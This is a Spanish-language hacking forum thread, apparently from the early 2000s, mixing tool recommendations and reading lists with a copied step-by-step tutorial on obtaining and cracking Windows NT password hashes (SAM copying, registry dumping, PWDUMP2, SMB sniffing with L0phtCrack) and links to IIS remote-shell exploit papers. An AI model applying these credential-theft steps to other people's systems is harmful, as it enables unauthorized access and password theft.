Bueno, he estado probando este soft, y es la leche para jugar por Internet.

Link: http://www.gamespyarcade.com

Te detecta los juegos que tienes instalados (aunq sean antiguos como el Rebellion o el Civ 2 Gold) y te conecta a sus servidores de juegos (Age2, Quake, COUNTER STRIKE, etc etc...) donde puedes meterte en partidas o crearlas, con gente de todo el mundo.

El manejo es sencillisimo, yo he exado ya algunas partidas mu wapas al Age2, Civ2, Rebellion, Counter (en servers gratuitos españoles muy rapidos, que no son de J21) y me va de maravilla, con una asombrosa velocidad.

Puedes chatear con los jugadores, ver que personas tiene tal juego, etc etc...

Si os gusta jugar por Internet COMPLETAMENTE GRATIS, pillad el software.

Por si kereis  ;D, a mi me encontrareis en:

Counter-Strike
Age of Empires 2
Rebellion
Civ 2 Gold
Chess --> Ajedrez

Hacedme caso, es la lexe :):)
#31
En mis ratos para hacer la scode y tal (mirad dudas hack) descubri el inmenso "poder" de este magnifico debugger / dissasembler.

El OllyDbg es lo mejorcito para esto, para mi gusto mejor que el SoftIce (demasiado engorroso su uso) y mucho mas potente que el WinDasm.

Es para win, no necesita cargarse en memoria ni cosas raras (como el Sice), es MUY SENCILLO de usar y tiene muchisimas funciones.

Es el mejor  :)
#32
Como todos sabemos, este subforo esta cambiando y entre los cambios que notaran sera la organizacion de la informacion, mucha de ella esta bastante desactualizada y alguna hasta obsoleta a quedado, estos cambios no se daran de la noche a la ma*ana asi de que les pedimos un poco de paciencia a todos los usuarios.

Este post ademas de servir para responder las tipicas preguntas que nos hacemos cuando iniciamos en este mundo, nos servira de guia para darnos un panorama de lo que podemos hacer hoy en dia con un poco de ingenio ysobre todo de "curiosidad".


INDICE

PREGUNTAS FRECUENTES by Rojodos

CONCEPTOS BASICOS DE HACKING by Rojodos
- La ip
- Sacar IP por MSN y demas
- Localizacion de IPs
- Shell
- Telnet
- Hackear hotmail
- Keyloggers
- Bugs
- Exploits
- Shellcodes
- DOS
- Diccionarios de palabras

CONCEPTOS TCP/IP
- Introduccion
- Modelo de Internet
- Direccion IP
- Mascaras de sub-red
- Puertos
- Protocolos TCP, UDP y ICMP


CONTRASEÑAS EN WINDOWS
- Contraseñas en Win9x
- Contraseñas en Win 2k, NT y XP
Teniendo Acceso Local
- Entrar en modo a prueba de fallos
- Control Userpasswords2
- Por medio del protector de pantalla
- SamInside
- Datapol Cia Commander
- NTFSDOS
- Pwdump2
- Utilizando Exploits
- Utilizando un Live-Cd
Teniendo Acceso Remoto
- Sniffando las contraseñas

SUBIR ARCHIVOS A UNA VICTIMA POR TFTP
- Configurando el Servidor
- Subir un archivo
- Bajar un archivo

MAPEAR PUERTOS A UN ROUTER
- Introduccion
- Router Airlink
- Speedstream
- 2Wire

ESCANEO DE PUERTOS

COMPILANDO Y EJECUTANDO EXPLOITS *
- Introducccion
- Compilando y ejecutando el exploit ms04011-lsasrv

NETCAT by Kamsky

............
#33
Hackear los Passwords de Windows NT

------------------------------------------------------------------------

Introducción:
En este texto vamos a tratar las distintas formas de crackear los passwords de Windows NT. Esto nos puede ser muy útil a la hora de hacer una auditoria de seguridad en nuestro sistema, o para seguir confirmando las debilidades del M$ Windows NT ;)

Lo primero que tenemos que hacer es conseguir los passwords hashes (trozos de password cifrados pero en formato texto ASCII) y hay 3 formas de hacerlo, desde un archivo SAM del disco, directamente del registro o mediante el uso de un sniffer.

Obteniendo el archivo SAM
Hay 3 formas en la que podemos extraer un password hash de un archivo SAM en el disco rígido, desde donde el sistema guarda el SAM, del disco de reparación de Windows NT o de una cinta de backup.

Para obtener el archivo SAM del disco rígido lo podemos encontrar en el directorio \\WINNT\SYSTEM32\CONFIG. Por default este archivo se puede leer pero no lo vamos a poder hacer mientras Windows NT se este ejecutando porque en ese momento se encuentra abierto de forma exclusiva por el sistema operativo. Lo que podemos hacer es iniciar la PC con otro sistema operativo y copiarlo directamente, si lo hacemos desde Linux no vamos a tener problemas porque este soporta las particiones NTFS de Windows NT; pero si lo queremos hacer desde Windows 9x, deberemos conseguir un programa como el Ntfsdos que nos permite acceder a la partición NTFS desde una partición FAT como la de Windows 9x; o sea, que haces un disco de inicio y copias el Ntfsdos en el, inicias el sistema con este disco y ejecutas el Ntfsdos que lo que hace es montar la partición NTFS a la FAT y entonces te vas al directorio \\WINNT\SYSTEM32\CONFIG y copias el archivo SAM al disco.

Otra forma de obtener el archivo SAM es mediante el disco de reparación; durante la instalación de Windows NT una copia del archivo de passwords es puesta en el directorio \\WINNT\REPAIR. En este archivo ya que se creo durante la instalación solo vamos a encontrar la cuenta del Administrador y la del Guest y nos va a ser útil solo si el Administrador no cambio la contraseña después de la instalación; pero si el Administrador actualizo sus discos de reparación entonces si vamos a poder encontrar una copia de todos los passwords del sistema. En este directorio vamos a encontrar el
archivo SAM pero comprimido como SAM. para poder crackearlo con el L0phtCrack que es uno de los mejores crackeadores de NT lo hacemos normalmente pero siempre y cuando lo estemos corriendo bajo Windows NT, si en cambio estamos corriendo el L0phtCrack en Windows 95/98 para poder importar el SAM. primero vamos a tener que descomprimirlo utilizando el comando "expand" de Windows NT de la siguiente forma: "expand SAM._ SAM" y luego lo importamos normalmente para poder crackearlo.  

El archivo SAM también queda guardado en las cintas de copia de seguridad cuando se hace un backup del sistema. Si conseguís una cinta de backup, podes restaurar el archivo SAM de \\WINNT\SYSTEM32\CONFIG a otra computadora para después crackearlo.

La herramienta que vamos a utilizar para crackear los SAM va a ser el L0phtCrack, simplemente porque es el mejor crackeador de passwords de Windows NT. Una vez que ya tenemos el SAM tememos que ir al menu "File" y seleccionar la opción "Import SAM File..." que nos va a desplegar un menú para poder seleccionar el archivo, una vez que ya lo importamos vamos a la opción "Tools" y seleccionamos la opción "Run Crack", luego de esto es cuestión de tiempo y por supuesto suerte.

Volcando los passwords desde el registro.
Otro método para obtener los password cifrados de un NT, es volcarlos desde el registro. Para hacer esto vamos a utilizar la opción "Tools Dump Passwords from Registry' de la herramienta L0phtCrack. Si tenemos privilegios de Administrador podemos volcar los passwords cifrados desde una maquina localmente, o sobre la red si es que la máquina remota tiene permisos de acceso al registro a través de la red; solamente especificamos el nombre de la computadora o la dirección IP de esta con el formato común de M$ "\\nombre de la computadora" o "\\direccion IP" dentro del cuadro de dialogo de "Dump Password from Registry" y presionamos OK. Una vez que hicimos todo esto ya tendríamos cargados los passwords cifrados dentro del L0phtCrack; así que ahora solo debemos proceder a crackear.

Una cosa a tener en cuenta es que si tenemos la versión en español del Windows NT la palabra Administrator esta cambiada por Administrador; por lo que el L0phtCrack no nos va a funcionar. Lo que vamos a hacer es editar el registro de Windows NT y decirle al L0phtCrack que busque por Administrador y no por Administrator, para esto vamos a editar el registro de la siguiente forma, usamos el regedit.exe y editamos la siguiente clave: HKEY_CURRENT_USER\Software\L0pht\L0phtCrack\AdminGroupName y cambiamos el valor que viene por Administrador.

Ademés de todo esto, Microsoft incluyo en el Service Pack 3 la utilidad SYSKEY que lo que hace es cifrar los passwords hashes, o sea que si el SP3 esta instalado en el sistema no vamos a poder volcar los passwords del registro; esto por lo menos usando el L0phtCrack, pero todavía podemos usar otra utilidad gratuita escrita por Todd Sabin llamada PWDUMP2, esta utilidad nos permite obtener los passwords hashes cifrados con la utilidad SYSKEY y exportarlos a un archivo de texto para después poder crackearlo con el L0phtCrack. El PWDUMP2 sirve siempre que se use localmente y se tenga privilegios de Administrador, pero entonces para que nos va a servir con propósitos de hacking?, bueno porque puede trabajar con cualquier copia del registro. Y recordemos que hay muchos malos Administradores de un sistema que permiten a los usuarios de dominio conectarse localmente, y que también durante la instalación han realizado un disco de rescate (rdisk.exe) ya que la opción por defecto es "Si", y recordemos que cada vez que se ejecuta rdisk.exe NT hace una copia del registro en %SystemRoot%\Repair (normalmente %SystemRoot% es c:\winnt). Y los permisos por defecto para ese directorio son de "lectura" para todos los usuarios.

Tengamos en cuenta que L0phtCrack esta limitado a volcar y abrir 65K de usuarios. Y si la lista de passwords es larga y tiene mas de 10.000 usuarios pongámonos muy cómodos porque vamos a esperar un rato...

Usando un sniffer.
Otro método que tenemos es capturar los passwords cifrados estando en una red, si tenemos un objetivo especifico deberíamos estar en el mismo segmento de red que la víctima. Este método es muy útil si no tenemos acceso físico ni remoto, o esta instalado el SYSKEY. Para hacer esto vamos a utilizar la opción "Tools SMB Packet Capture" del L0phtCrack, esto nos abrirá una ventana y ya estaríamos capturando todas las sesiones de autentificación SMB. En este texto siempre estamos hablando de la versión 2.5 del L0phtCrack, así que si tenían instalado una versión anterior de esta herramienta hay remover el driver de red NDIS de la solapa "Protocolos" de la configuración de "Red" en el "Panel de Control" (esto es en Windows NT). Todos los logueos que vayamos capturando irán apareciendo en la ventana del SMB Packet Capture, para guardar esto lo podemos hacer con el botón "Save Capture". Para comenzar a crackear los passwords que capturamos primero los tenemos que guardar y luego abrir el archivo que se creo. Si dejamos al L0phtCrack uno o dos días capturando passwords seguramente tendríamos los suficientes como para realizar nuestro objetivo.

Donde conseguir los programas que necesitamos?
Aquí se muestra donde conseguir y una breve reseña de todos los programas que se mencionan durante el desarrollo del articulo; también los podes bajar de la web de Ezkracho: http://www.ezkracho.piratas.org/ pero igualmente se va a poner la fuente original de estos.

Ntfsdos.
El Ntfsdos lo podemos encontrar en http://www.systernals.com/ntfs20r.zip y como ya se explico nos sirve para acceder a una partición NTFS desde una partición FAT, no hace falta decir cual es la gran ventaja de esto.

L0phtCrack.
El L0phtCrack lo podemos encontrar en http://www.l0pht.com/l0phtcrack/ la última versión que podemos encontrar hasta el momento es la 2.5 que se puede usar durante un periodo de prueba por 15 días, luego vamos a necesitar registrarlo para continuar con su uso. El método mas rápido para crackear un password es mediante una ataque de diccionario, podemos usar el diccionario que viene con el L0phtCrack que es chico pero muy efectivo o también buscar en la red un diccionario mucho mas grande que seguro hay muchos dando vuelta. Otro método que utiliza L0phtCrack es el llamado "híbrido" que lo que hace es a las palabras que encuentra en el diccionario agregarles letras o símbolos, por ejemplo hay gente que pone su nombre con símbolos al final o intermedio, Juan$$Perez o JuanPerez!!. El tercer y último método que utiliza el L0phtCrack es el de Fuerza Bruta que ya todos saben como funciona, este es el método mas seguro y descifra la clave sin ninguna duda, solo es cuestión de tiempo...

PWDUMP2.
El PWDUMP2 es un programa gratuito escrito por Todd Sabin y lo podemos encontrar en http://www.webspan.net/~tas/pwdump2/. Para una mayor descripción de como conseguir los passwords hashes para usarlos con esta utilidad ver en la pagina web de esta utilidad. Cabe acotar que el uso de PWDUMP2 en conjunto con L0phtCrack es una excelente arma, para realizar auditorias por supuesto...


Autor: Desconocido (Si alguien sabe el autor, que lo comunique por favor)

Este articulillo no es mio, puede que tenga errores tecnicos o este desfasado. En ese caso, agradeceria cualquier comentario, aclaracion o correccion del mismo.

:)
#34
Todo estos documentos estan basados en bugs muy famosos que proveen de shell remotas (con privilegios de admin) en los productos de MicroChoft. Si estais asaltando un IIS montado en un Windows NT5 o 2000, estos son vuestros textos :)

Estan ordenados de menor a mayor actualidad.

------  Bug Unicode (Famosisimo):
http://ns2.elhacker.net/timofonica/manuales/unicodex.zip

------  Bug Decode (Double Decode, basado en el Unicode :D):

http://cyruxnet.com.ar/iiscgi.htm

www.iespana.es/rojo2/Papers/Hack2k.zip

------  Bug ISAPI

http://cyruxnet.com.ar/isapi.htm

------  Bug WebDav (el mas nuevo, existe miles de servidores vulnerables a este bug):

http://members.lycos.co.uk/xpyxt//Exploracion%20del%20bug%20webdav.pdf      -- En español

http://www.fatelabs.com/library/fatelabs-ntdll-analysis.pdf

http://www.nextgenss.com/papers/ms03-007-ntdll.pdf


Exploits para estos bugs asi como las herramientas adicionales, es cuestion de buscar en estos sites:

www.packetstormsecurity.org
www.hack.co.za
www.securityfocus.org
www.cyruxnet.com.ar

etc...

Si no entendeis algo, o kereis hacer algun comentario, no dudeis en hacerlo.
#35
Docs y manuales que recomiendo de encarecida lectura, que creo q son basicos:


- Biblia Hacker NT
- Fallas basicas en windows NT/2000
- Routers, todo sobre ellos, en especial los CISCO
- Crackear SAMs / PWLs
- Crackear passwords en UNIX (muchos manuales....)
- Hack NT
- Cualkiera sobre el protocolo NetBios (recursos compartidos) , hay muchos.
- Todo sobre el bug mas famoso del Windows NT/2k, el Unicode/Decode (Docs: Unicodex, Unicode, Manual Dumpeos, etc...)
- Telnet
- TCP/IP y otros protocolos, UDP/NetBEUI/IPX/etc...
- Redes LAN, WAN, Novell Netware, etc...
- Inyeccion SQL
- XSS (Site Cross Scripting)
- Cookies
- Analisis Remoto de Sistemas by Honoriak (tremendo)
- Proxys y Anonimato en general
- Cifrado y Encriptacion (PGP, GnuPG, etc...)
- Manual del NetCat (para que se vea lo potente que es esta herramienta)
- Emascaramiento en Linux atraves de IPchains
- Emulacion Shell Bash en Windows, CYGWIN
- Virus (leer sobre ellos)
- Informaros de los fallos que traen los modulos de PHP-Nuke y Post Nuke, son muchos.


Bien, se que aki no estan todos, asi que recomendad textos que creais que son realmente utiles y wenos, y si son dificiles de encontrar, poned dnd stan.

EZINES:

Esto lo hago a titulo personal, he leido bastantes, algunas man gustao, otras no..... Tened en cuenta que son en ellas donde (al menos yo) encontrais la informacion mas buena, pues normalmente esta hecha por gente con grandes conocimientos

- SET ---> La mejor
- Orion
- Ezkracho
- 7e69
- Elektro
- Disidents Hack Journal
- HVEN
- FIH ---> Dnd participo  ;D
.....

Se que hay muchas mas, solo recomendad cuales creeis que son las mejores o recomendadas.

Donde encontrar todos estos docs y ezines?? Buscando por Inet! Aki van algunas direcciones con buenos textos y ezines:

- www.elhacker.net
- www.vanhackez.com
- www.prehackers.com
- www.hackemate.com.ar
- www.cyruxnet.com.ar
........

(se que hay mas sitios, cuestion de buscar...). Espero q tengais ganas de leer, pues la informacion que hay rulando por Internet es realmente extensa.

Ya sabeis, leed , leed, y leed mas!

Lo que no entendais de lo que leais, preguntadlo!

Un saludo a todos!